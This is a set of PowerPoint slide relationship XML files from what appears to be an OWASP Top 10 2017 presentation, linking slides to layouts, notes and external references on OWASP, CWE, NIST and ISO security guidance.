<file path=ppt/slides/_rels/slide17.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><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 /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final" TargetMode="External" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide16.xml" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#8:_Implement_Logging_and_Intrusion_Detection" TargetMode="External" /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/778.html" TargetMode="External" /><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www-01.ibm.com/common/ssi/cgi-bin/ssialias?htmlfid=SEL03130WWEN&amp;" TargetMode="External" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml" /><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.blogspot.com/2017/08/owasp-top-10-2017-project-update.html" TargetMode="External" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml" /><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/223.html" TargetMode="External" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project" TargetMode="External" /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project"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Category:Vulnerability_Scanning_Tools" TargetMode="External" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Logging_Cheat_Sheet" TargetMode="External" /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_AppSensor_Project" TargetMode="External" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide18.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Secure_Software_Contract_Annex" TargetMode="External" /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/WebGoat" TargetMode="External" /><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide17.xml" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External" /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Education_Project" TargetMode="External" /><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Broken_Web_Applications_Project" TargetMode="External" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml" /><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Juice_Shop_Project" TargetMode="External" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag16.xml" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://stores.lulu.com/owasp" TargetMode="External" /><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/" TargetMode="External" /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Node_js_Goat_Project" TargetMode="External" /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls" TargetMode="External" /><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Chapter" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Projects" TargetMode="External" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External" /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_WebGoat.NET" TargetMode="External" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide19.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide18.xml" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag17.xml" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Security_Knowledge_Framework" TargetMode="External" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide2.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Chapter" TargetMode="External" /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide3.xml" /><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide8.xml" /><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide16.xml" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide1.xml" /><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11.xml" /><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide24.xml" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External" /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide2.xml" /><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide7.xml" /><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml" /><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide23.xml" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml" /><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide6.xml" /><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml" /><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag1.xml" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/user/OWASPGLOBAL" TargetMode="External" /><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org" TargetMode="External" /><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide14.xml" /><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide22.xml" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4.png" /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide5.xml" /><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13.xml" /><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml" /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://lists.owasp.org/mailman/listinfo" TargetMode="External" /><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide9.xml" /><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://creativecommons.org/licenses/by-sa/3.0/" TargetMode="External" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_AppSec_Conference" TargetMode="External" /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide4.xml" /><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml" /><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml" /><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml" /><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide20.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><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notesSlide" Target="../notesSlides/notesSlide19.xml" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramLayout" Target="../diagrams/layout1.xml" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag18.xml" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramData" Target="../diagrams/data1.xml" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Application_Security_Guide_For_CISOs" TargetMode="External" /><Relationship Id="rId10" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing1.xml" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors1.xml" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide21.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.microsoft.com/office/2007/relationships/diagramDrawing" Target="../diagrams/drawing2.xml" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide20.xml" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/diagramColors" Target="../diagrams/colors2.xml" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag19.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22.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide21.xml" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag20.xml" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide13.xml" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide23.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/601.html" TargetMode="External" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide22.xml" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/451.html" TargetMode="External" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag21.xml" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/434.html" TargetMode="External" /><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/918.html" TargetMode="External" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/400.html" TargetMode="External" /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/829.html" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/352.html" TargetMode="External" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/799.html" TargetMode="External" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide24.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/Top10/tree/master/2017/datacall" TargetMode="External" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide23.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22.xml" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide10.xml" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide25.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><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1.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23.xml" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/Top10/tree/master/2017/datacall/submissions" TargetMode="External" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide3.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml" /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide2.xml" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml" /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.autodesk.com/" TargetMode="External" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag2.xml" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml" /><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/top10" TargetMode="External" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml" /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OWASP/Top10/issues" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:OWASP_Application_Security_Verification_Standard_Project" TargetMode="External" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide4.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Testing_Project" TargetMode="External" /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls" TargetMode="External" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide3.xml" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series" TargetMode="External" /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide21.xml" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml" /><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide25.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag3.xml" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Guide_Project" TargetMode="External" /><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide20.xml" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide17.xml" /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_SAMM_Project" TargetMode="External" /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide19.xml" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide18.xml" /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS" TargetMode="External" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide5.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide12.xml" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide4.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4.xml" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide15.xml" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide11.xml" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)" TargetMode="External" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide6.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.owasp.org/index.php/Command_Injection" TargetMode="External" /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.asd.gov.au/infosec/mitigationstrategies.htm" TargetMode="External" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide5.xml" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/22.html" TargetMode="External" /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.nist.gov/cyberframework" TargetMode="External" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag5.xml" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slide22.xml" /><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/isoiec-27001-information-security.html" TargetMode="External" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology" TargetMode="External" /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.microsoft.com/en-us/download/details.aspx?id=49168" TargetMode="External" /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.iso.org/iso-31000-risk-management.html" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Top_10" TargetMode="External" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Threat_Risk_Modeling" TargetMode="External" /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator" TargetMode="External" /></Relationships>
</file>

<file path=ppt/slides/_rels/slide7.xml.rels>&#65279;<?xml version="1.0" encoding="utf-8" standalone="yes"?><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8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/ASVS_V5_Input_validation_and_output_encoding" TargetMode="External" /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet" TargetMode="External" /><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/77.html" TargetMode="External" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide7.xml" /><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/917.html" TargetMode="External" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/OWASP_Proactive_Controls#2:_Parameterize_Queries" TargetMode="External" /><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Preven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OWASP_Automated_Threats_to_Web_Applications" TargetMode="External" /><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/564.html" TargetMode="External" /><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag6.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s://www.owasp.org/index.php/Testing_for_ORM_Injection_(OTG-INPVAL-007)" TargetMode="External" /><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Flaws" TargetMode="External" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools" TargetMode="External" /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Query_Parameterization_Cheat_Sheet" TargetMode="External" /><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="(https:/portswigger.net/kb/issues/00101080_serversidetemplateinjection)" TargetMode="External" /><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013)" TargetMode="External" /><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/89.html" TargetMode="External" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Source_Code_Analysis_Tools" TargetMode="External" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)" TargetMode="External" /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.owasp.org/index.php/Injection_Prevention_Cheat_Sheet_in_Java" TargetMode="External" /><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/kb/issues/00101080_serversidetemplateinjection" TargetMode="External" /></Relationships>
</file>

